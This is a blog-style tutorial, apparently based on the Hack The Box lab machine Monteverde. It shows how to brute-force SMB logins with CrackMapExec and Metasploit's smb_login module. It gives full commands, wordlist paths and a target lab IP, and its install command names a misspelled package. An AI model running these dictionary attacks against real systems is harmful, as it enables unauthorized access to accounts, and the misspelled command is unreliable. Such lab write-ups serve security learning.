INTRO
Recently, I was hacking an HTB box named, Monteverde. when I start enumerating, I found some ports. I saw an SMB service and WInrm service. When I tried to enumerate the SMB port, I was successful to achieve the users. but I got no password for any user. in that case, I had to use a tool named, Crackmapexec. It performers Dictionary Attack on SSH, Winrm, HTTP, and SMB. actually, some people call dictionary attacks brute-force attacks. well, I am one of them. it is not important what you call it, important thing is to perform the attack.
though, it was a quite simple CTF. however, I could use Metasploit, Ncrack, Hydra for brute-forcing the SMB or any other service. but I heard about this tool and I never heard of it before, so I decide to use this to know something new things. and I can say that it was a great decision.
But today, I will teach you to hack SMB with Metasploit and the uses of the Crackmapexec tool. and before starting this I would recommend you to take a look back at these articles on :
And one more thing, I am using Kali Linux. if you are using any other Linux distribution, there are chances that you may get some error during the installation of the Crackmapexec.
ATTACK
- Crackmapexec Method
I have already told you about how I found this tool before. now without talking rubbish, we can take a look at this tool. Crackmapexec doesn’t come pre-installed in Kali-Linux. so we have to install it. you can go to its GitHub and manually install it(all the instruction are provided on the GitHub page). though, it is necessary for you to check the GitHub page if you are using another OS.
but Kali-Linux user can paste the following command into the terminal:
apt-get install crackexec
It can take some time to install and the first run will take a little bit of extra time.
To use this tool, open your terminal and type this command:
crackmapexec --help
this command will show you the help section of Crackmapexec tool.
OUTPUT:
optional arguments:
-h, --help show this help message and exit
-t THREADS set how many concurrent threads to use (default: 100)
--timeout TIMEOUT max timeout in seconds of each thread (default: None)
--jitter INTERVAL sets a random delay between each connection (default: None)
--darrell give Darrell a hand
--verbose enable verbose output
protocols:
available protocols
{ssh,mssql,http,winrm,smb}
ssh own stuff using SSH
mssql own stuff using MSSQL
http own stuff using HTTP
winrm own stuff using WINRM
smb own stuff using SMB
As you can see, there are many services to perform brute-force on. to perform a brute-force attack on a particular service, you will need a Wordlist
I am using rockyou.txt(every simple password you can find in this wordlist). in your case, you can use your custom one. I am using rockyou.txt only for demonstration purpose.
type this command to start brute-force attack on SMB service:
crackmapexec smb 10.10.10.172 -u /root/Desktop/users.txt -p /root/Desktop/rockyou.txt.txt
Where :
smb is a service and you can change it some other services as well.
-u stands for the path username file or a username.
-p stands for the password file.
2. Metasploit
Metasploit is a well know and powerful Framework. we will use Metasploit to brute-force SMB.
first of all, we will start the Metasploit with this command:
msfconsole
and after that, we will use an auxiliary module:
use auxiliary/scanner/smb/smb_login show options
Screenshot:
now we will set options:
set USER_FILE /root/Desktop/user.txt set PASS_FILE /root/Desktop/rockyou.txt set RHOSTS 10.10.10.172
Where:
USER_FILE stands for the username file path.
PASS_FILE stands for the password file path.
and the RHOSTS is the IP of our host.
you can also change the port if it is necessary.
and then type run or exploit to start the attack. there are other modules available to perform such attacks on various services such as SSH, FTP and SFTP.
Stay home, stay safe and keep reading our articles.
Thanks For Visiting.
Thanks for sharing that info